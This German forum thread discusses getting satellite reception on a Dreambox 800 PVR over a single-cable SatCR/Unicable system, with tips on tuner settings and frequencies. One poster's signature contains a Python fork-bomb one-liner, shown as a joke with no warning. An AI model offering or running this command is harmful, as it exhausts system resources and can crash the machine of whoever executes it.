Suche nach Lösung für Einkabeltechnik Sat Tuner Dream800 PVR >kein Empfang <

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Suche nach Lösung für Einkabeltechnik Sat Tuner Dream800 PVR >kein Empfang <

      Hallo zusammen, kurze Schilderung jetzt : ein Freund von mir hat sich eine Eigentumswohnung gekauft und dort wurde das Kabelnetz gekappt und das Alte Kabel für Sat Anlage benutzt.
      Wollte gestern eine Dream 800 PVR anschliessen kein Bild also kein Sat Empfang in diesem Haus gehen dort angeblich nur Sat Receiver von Techni Sat . Habe mir die Einstellungen der Technisat fürs LNB
      angeschaut und etwas rumprobiert , also Signalempfang ist wirklich nur bei der LNB Auswahl : -----> SatCR LNB < ------.
      Gibt es hierfür eine Lösung ?
      Leider habe ich es bei der 800er PVR nicht hinbekommen in den Einstellungen.

      P.S.Bei mir zu Hause funktioniert Sie

      Danke schonmal für Infos
      Dream900 UHD
      Dream800SE V.2
      Dream 800SE V.1
    • Suche nach Lösung für Einkabeltechnik Sat Tuner Dream800 PVR >kein Empfang <

      Sorry bin auf der Arbeit und habe das Foto gestern mit dem Handy gemacht war eben mal kurz am PC bin aber wieder raus deshalb Tapatalk


      Gesendet von iPhone mit Tapatalk
      Dream900 UHD
      Dream800SE V.2
      Dream 800SE V.1
    • Chanel01 schrieb:

      Leider habe ich es bei der 800er PVR nicht hinbekommen in den Einstellungen.
      Gibt es bei der 800 bzw. bei dem Tuner der 800 die Einstellung "Unicable" - Grundeinstellung "Erweitert"? Das wäre die richtige Einstellung für "SatCR", denn auch das ist Unicable.
      Dann noch die richtige Frequenz einstellen (muss mit den anderen Nutzern im Haus abgeklärt werden, wie die Frequenzen verteilt sind).
      Yamp - Musicplayer mit Arist-Art-Hintergrund und "Karaoke Light" - aktuelle Version V3.3.2 hier, bitte beachten: FAQ hier

      Wissen ist eins der wenigen Güter, das sich durch Teilen vermehren lässt .... :thumbsup:
    • Ich habe auch noch ne 7020 am unicable LNB geht tadellos und wie schon geschrieben musst du auf erweitert gehen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Suche nach Lösung für Einkabeltechnik Sat Tuner Dream800 PVR >kein Empfang <

      AlfredENeumann schrieb:

      Chanel01 schrieb:

      Leider habe ich es bei der 800er PVR nicht hinbekommen in den Einstellungen.
      Gibt es bei der 800 bzw. bei dem Tuner der 800 die Einstellung "Unicable" - Grundeinstellung "Erweitert"? Das wäre die richtige Einstellung für "SatCR", denn auch das ist Unicable.
      Dann noch die richtige Frequenz einstellen (muss mit den anderen Nutzern im Haus abgeklärt werden, wie die Frequenzen verteilt sind).


      Danke für die Info muss mal schauen ob ich am Wochenende nochmal hinfahre wäre schade wenn das nicht funktionieren würde


      Gesendet von iPhone mit Tapatalk Pro
      Dream900 UHD
      Dream800SE V.2
      Dream 800SE V.1
    • Vor etwa 2 Jahren habe ich bei meiner Tochter meine alte 8000er an einen Technisat Unicabel-Anschluss installiert. Wenn ich mich richtig erinnere, gab es da bei den Unicabeleinstellungen sogar die Option Technisat. Mit der Einstellung (bzw. wenn es mehrere Technisat-Unicalbe-Varianten vorhanden sein sollte, dann durchtesten) und den dem Antennenanschluss zugewiesenen Frequenzen ohne weitere Änderungen der vorgegebenen weiteren Einstellungen einen Sendersuchlauf starten. Hat damals problemlos funktioniert.
      Wenn du mehre Frequenzen bekommen hast, dann kannst du an der Antennendose mehrere Tuner versorgen. Jeder Tuner bekommt aber eine verschiedene Frequenz und diese nur einmal (so ist das jedenfalls gedacht). Bei der Verwendung von T-Stücken, d.h. ein Eingang auf zwei Ausgänge, zur Verteilung des Antennensignals unbedingt Verteiler speziell für Unicable verwenden.
      Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer

      Der Mensch wird geboren, blamiert sich, und stirbt!